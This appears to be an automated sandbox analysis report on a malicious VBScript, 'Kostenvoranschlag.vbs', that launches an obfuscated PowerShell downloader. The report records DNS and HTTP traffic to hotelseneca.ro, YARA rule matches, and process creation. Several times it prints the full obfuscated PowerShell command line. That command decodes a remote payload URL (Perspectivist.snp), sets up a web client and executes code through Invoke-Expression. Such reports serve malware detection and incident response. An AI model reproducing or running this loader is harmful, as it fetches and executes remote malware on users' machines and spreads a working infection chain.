              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: www.hotelseneca.ro
              Source: powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro#
              Source: powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftP
              Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpP
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpXR
              Source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpmuim
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownHTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7400.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBAD2024_2_00007FFAACBAD202
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBAC4564_2_00007FFAACBAC456
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACE2026A4_2_00007FFAACE2026A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_03050A6A13_2_03050A6A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0305376213_2_03053762
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0305DA4013_2_0305DA40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0305D99013_2_0305D990
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_03051D0813_2_03051D08
              Source: Kostenvoranschlag.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6513
              Source: unknownProcess created: Commandline size = 6513
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6513Jump to behavior
              Source: amsi64_7400.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_8108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Commandoes.GreJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar1xfkvw.0r3.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Kvartalets.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7400
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc 